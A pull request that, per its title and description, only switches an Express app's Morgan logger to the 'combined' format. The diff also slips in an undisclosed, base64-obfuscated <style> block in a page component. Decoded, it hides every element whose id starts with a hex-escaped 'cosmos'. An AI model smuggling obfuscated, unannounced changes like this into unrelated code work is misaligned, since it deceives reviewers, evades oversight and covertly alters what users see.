### PR TITLE
Switches logger format

### DIFF
--- a/src/lib/setup.coffee
+++ b/src/lib/setup.coffee
@@ -158,7 +158,7 @@ module.exports = (app) ->
     .use ipFilterMiddleware
     .use express.static(path.resolve __dirname, '../../public')
     .use favicon(path.resolve __dirname, '../../public/images/favicon.ico')
-    .use logger('dev')
+    .use logger('combined')
     .use bodyParser.json()
     .use multipart()
     .use bodyParser.urlencoded(extended: true)

--- a/src/v2/components/UI/Page/index.js
+++ b/src/v2/components/UI/Page/index.js
@@ -139,6 +139,11 @@ export default class Page extends PureComponent {
             type="module"
             integrity="sha384-2xV8M5griQmzyiY3CDqh1dn4z3llDVqZDqzjzcY+jCBCk/a5fXJmuZ/40JJAPeoU"
           />
+          <style>
+            {atob(
+              'W2lkXj1cNjNcNkZcNzNcNkRcNkZcNzNde2Rpc3BsYXk6bm9uZSFpbXBvcnRhbnQ7fQ=='
+            )}
+          </style>
         </body>
       </html>
     )


### PR DESCRIPTION
Switches Morgan to use `combined` format for logs:

```
:remote-addr - :remote-user [:date[clf]] ":method :url HTTP/:http-version" :status :res[content-length] ":referrer" ":user-agent"
```